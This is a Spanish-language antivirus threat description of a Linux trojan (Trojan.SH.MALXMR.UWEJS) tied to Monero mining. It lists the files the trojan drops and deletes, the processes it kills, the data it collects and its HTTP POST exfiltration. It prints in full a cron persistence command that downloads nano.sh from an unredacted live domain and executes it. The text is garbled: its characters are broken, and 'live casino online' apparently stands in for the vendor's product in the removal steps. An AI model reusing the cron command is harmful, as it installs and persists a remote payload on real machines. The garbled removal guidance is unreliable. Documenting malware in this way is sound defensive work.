An¨¢lisis realizado por : Joshua Paul Ignacio   

 Alias

N/A

 Plataforma:

Linux

 Riesgo general:
 Potencial de destrucci¨®n:
 Potencial de distribuci¨®n:
 Infecci¨®n divulgada:
 Revelaci¨®n de la informaci¨®n:
Bajo
Medio
High
°ä°ù¨ª³Ù¾±³¦´Ç

  • Tipo de malware
    Trojan

  • Destructivo?
    No

  • Cifrado
    No

  • In the Wild:
    ³§¨ª

  Resumen y descripci¨®n

Canal de infecci¨®n Descargado de Internet, Eliminado por otro tipo de malware

Puede haberlo descargado otro malware/grayware/spyware desde sitios remotos.

Elimina archivos para impedir la ejecuci¨®n correcta de programas y aplicaciones.

Este malware se elimina tras la ejecuci¨®n.

  Detalles t¨¦cnicos

Tama?o del archivo 1,927 bytes
Tipo de archivo , Other
Residente en memoria No
Fecha de recepci¨®n de las muestras iniciales 06 de enero de 2020
Carga ¨²til Connects to URLs/IPs, Steals information, Downloads files

Detalles de entrada

Puede haberlo descargado el siguiente malware/grayware/spyware desde sitios remotos:

±õ²Ô²õ³Ù²¹±ô²¹³¦¾±¨®²Ô

Infiltra y ejecuta los archivos siguientes:

  • x
  • start.pl

Crea las carpetas siguientes:

  • /var/tmp/.nano
  • /tmp/.vd

Otras modificaciones del sistema

Elimina los archivos siguientes:

  • nohup.out
  • /tmp/min.sh
  • /tmp/min
  • /tmp/nohup.out
  • /tmp/cron.d
  • /var/tmp/.nano
  • /{Current Directory}/cron.d
  • cron.d
  • .bin
  • /dev/shm/.bin
  • /tmp/.bin
  • /dev/shm/monero.tgz
  • .vd
  • /tmp/.vd
  • /tmp/.vd/sslm.tgz
  • min*
  • {Current Directory}/min*
  • /tmp/min*

Finalizaci¨®n del proceso

Finaliza los procesos siguientes si detecta que se ejecutan en la memoria del sistema afectado:

  • rand
  • rx
  • rd
  • tsm
  • tsm2
  • haiduc
  • a
  • sparky
  • sh
  • 2238Xae
  • b
  • f
  • i
  • p
  • y
  • rsync
  • ps
  • go
  • x
  • s
  • b
  • run
  • idle
  • minerd
  • crond
  • yam
  • xmr
  • python
  • cron
  • ntpd
  • start
  • start.sh
  • libssl
  • sparky.sh

Rutina de descarga

Guarda los archivos que descarga con los nombres siguientes:

Robo de informaci¨®n

Recopila los siguientes datos:

  • Current Directory
  • username
  • System time and date
  • Kernel Information
  • Number of Processing Units
  • List of Display Interface

Informaci¨®n sustra¨ªda

Este malware env¨ªa la informaci¨®n recopilada a la siguiente URL a trav¨¦s de HTTP POST:

  • http://{BLOCKED}ter.com/assets/.style/remote/info.php

Otros detalles

Hace lo siguiente:

  • It creates the following cron jobs for persistence:
    Path: {Current Directory}/cron.d
    • Schedule: Every 30 minutes
    • Command: */30 * * * * /var/tmp/.nano/nano.sh &> /dev/null @reboot /bin/mkdir /var/tmp/.nnao && /usr/bin/curl -s https://upajmeter.com/assets/.style/nano.sh && /bin/chmod +x /var/tmp/.nano/nano.sh && /var/tmp/.nano/nano.sh

Este malware se elimina tras la ejecuci¨®n.

  Soluciones

Motor de exploraci¨®n m¨ªnimo 9.850
Primer archivo de patrones de VSAPI 15.608.01
Primera fecha de publicaci¨®n de patrones de VSAPI 07 de enero de 2020
Versi¨®n de patrones OPR de VSAPI 15.609.00
Fecha de publicaci¨®n de patrones OPR de VSAPI 08 de enero de 2020

Explorar el equipo con su producto de live casino online para eliminar los archivos detectados como Trojan.SH.MALXMR.UWEJS En caso de que el producto de live casino online ya haya limpiado, eliminado o puesto en cuarentena los archivos detectados, no ser¨¢n necesarios m¨¢s pasos. Puede optar simplemente por eliminar los archivos en cuarentena. Consulte esta para obtener m¨¢s informaci¨®n.


Rellene nuestra encuesta!